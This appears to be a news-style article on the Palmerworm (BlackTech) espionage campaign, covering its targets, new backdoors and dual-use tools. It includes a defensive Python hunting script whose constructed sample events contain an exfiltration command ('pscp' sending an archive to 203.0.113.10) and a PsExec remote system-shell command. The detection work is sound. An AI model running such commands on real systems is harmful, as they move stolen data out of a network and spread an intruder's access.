Who is Palmerworm?
The Palmerworm APT group, also known as BlackTech, is believed to have started its cybercriminal activities back in 2013. Although it is not certain where the group originates, Taiwanese officials have previously claimed that Palmerworm is backed by China. If this is true, it means that a government-backed Chinese hacking group has targeted Chinese companies. Palmerworm is considered an espionage group whose likely motivation is stealing information from targeted organizations. In past campaigns the group has attacked organizations in the East Asia region, targeting companies in China, Taiwan and Japan. However, in the latest campaign US organizations were also targeted.
The Campaign
The espionage campaign was uncovered by Symantec’s Threat Hunter Team, who detailed their findings in a report published yesterday. Symantec is an American software company that provides cybersecurity software and services. According to Symantec’s report, the campaign targeted businesses of all sizes in the media, construction, engineering, electronics and finance sectors. The campaign began in August 2019 and continued into 2020. During the campaign Palmerworm managed to gain access to targeted organizations’ networks and remain undetected for months. Symantec found evidence of the group’s activities on the network of a Taiwanese media company. The group remained active on the company’s network for a year, with activity being detected as recently as August 2020. The Symantec team also observed Palmerworm activity on networks belonging to US organizations. However, the team was unable to ascertain which sector the targeted US organizations belonged to. The report states that Palmerworm had been active on one US organization’s systems for six months without being detected. The other companies targeted include a Chinese construction company and a Taiwanese finance company, on whose networks Palmerworm was active for several months. Furthermore, a Taiwanese electronics company was targeted for a couple of weeks, and a Japanese engineering company for a couple of days. As these last two companies were only targeted for relatively short periods, the report concludes that “The finance, media, and construction industries, then, appear to be of the biggest interest to Palmerworm in this campaign.”
Technology Used
The APT group used dual-use tools and previously unseen custom malware in its latest campaign. The malware included backdoors from the Consock, Waship, Dawit and Nomri custom malware families. In the report the Symantec team states, “We have not observed the group using these malware families in previous attacks – they may be newly developed tools, or the evolution of older Palmerworm tools.” In addition to the new backdoors, Palmerworm used a trojanized custom loader and the network reconnaissance tool HackTool. As in previous campaigns, the group also used several legitimate dual-use tools to break into systems and steal data. The tools include PuTTY for remote access and data exfiltration and PsExec for lateral movement within victims’ systems. Also used were SNScan for network reconnaissance and WinRAR for compressing stolen files before exfiltrating them. In this campaign, as in previous attacks, Palmerworm used stolen code-signing certificates to digitally sign malicious payloads, which allows those payloads to evade enterprise malware detection mechanisms that trust a valid signature.
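The dual-use tool chain described above (WinRAR to stage stolen files, PuTTY-family tools to move them out, PsExec for lateral movement) is something a defender can hunt for in process-creation telemetry. The following is an added example, not code from the article or from Symantec: it correlates constructed process-creation events per host and, because the article notes that payloads were signed with stolen code-signing certificates, it deliberately does not let a valid signature suppress a finding. The log layout, host names, paths and the 203.0.113.10 address are all constructed for this example.

```python
"""Hunt for the Palmerworm-style dual-use tool chain in process-creation events.
Tool names come from the article; the event format and sample data are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (host, ISO timestamp, image basename, command line, signature status)
EVENTS = [
    ("WS-01", "2020-08-02T09:00:00", "WinRAR.exe", r"winrar a -ep1 c:\temp\fin.rar c:\share\finance", "Valid"),
    ("WS-01", "2020-08-02T09:07:00", "pscp.exe", r"pscp c:\temp\fin.rar user@203.0.113.10:/up/", "Valid"),
    ("WS-01", "2020-08-02T09:10:00", "PsExec.exe", r"psexec \\SRV-02 -s cmd.exe", "Valid"),
    ("WS-02", "2020-08-02T10:00:00", "WinRAR.exe", r"winrar x backup.rar", "Valid"),
    ("WS-03", "2020-08-02T11:00:00", "svchost.exe", "svchost -k netsvcs", "Valid"),
]

ARCHIVERS = {"winrar.exe", "rar.exe"}                          # staging stolen files
REMOTE_XFER = {"putty.exe", "pscp.exe", "plink.exe", "psftp.exe"}  # PuTTY family
LATERAL = {"psexec.exe", "psexesvc.exe"}                       # PsExec client/service

def parse(event):
    host, ts, image, cmdline, sig = event
    return host, datetime.fromisoformat(ts), image.lower(), cmdline.lower(), sig

def hunt(events, window_minutes=30):
    """Return {host: [finding, ...]} for hosts showing the tool chain.
    The signature status field is intentionally ignored: a 'Valid' signature
    may come from a stolen certificate and must not suppress the finding."""
    by_host = defaultdict(list)
    for event in events:
        host, t, image, cmdline, _sig = parse(event)
        by_host[host].append((t, image, cmdline))
    findings = defaultdict(list)
    window = timedelta(minutes=window_minutes)
    for host, evs in by_host.items():
        evs.sort()
        # Staging = an archive being created ('a' command), not merely extracted ('x').
        staged = [t for t, img, cmd in evs if img in ARCHIVERS and cmd.split()[1:2] == ["a"]]
        for t, img, cmd in evs:
            if img in REMOTE_XFER and any(timedelta(0) <= t - s <= window for s in staged):
                findings[host].append("archive staged then transferred with %s" % img)
            if img in LATERAL:
                findings[host].append("lateral movement via %s" % img)
    return dict(findings)

if __name__ == "__main__":
    for host, hits in hunt(EVENTS).items():
        print(host, "->", "; ".join(hits))
```

Only WS-01 is reported: WS-02 merely extracts an archive and WS-03 shows nothing from the tool set, so the rule keys on the staging-then-transfer sequence rather than on any single tool name.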
Be Aware of Phishing
As to how the group gained access to targeted organizations, the report explains “We did not see what infection vector Palmerworm used to gain initial access to victim networks in this campaign, however, in the past the group has been documented as using spear-phishing emails to gain access to victim networks.” Unfortunately, the nature of advanced hacking campaigns means they can be difficult to detect and defend against. However, organizations and individuals alike can take steps to protect themselves against phishing scams of the kind probably used in Palmerworm’s campaign. As well as using good antivirus software to block suspicious activity, experts also recommend using VPNs for additional cyber protection.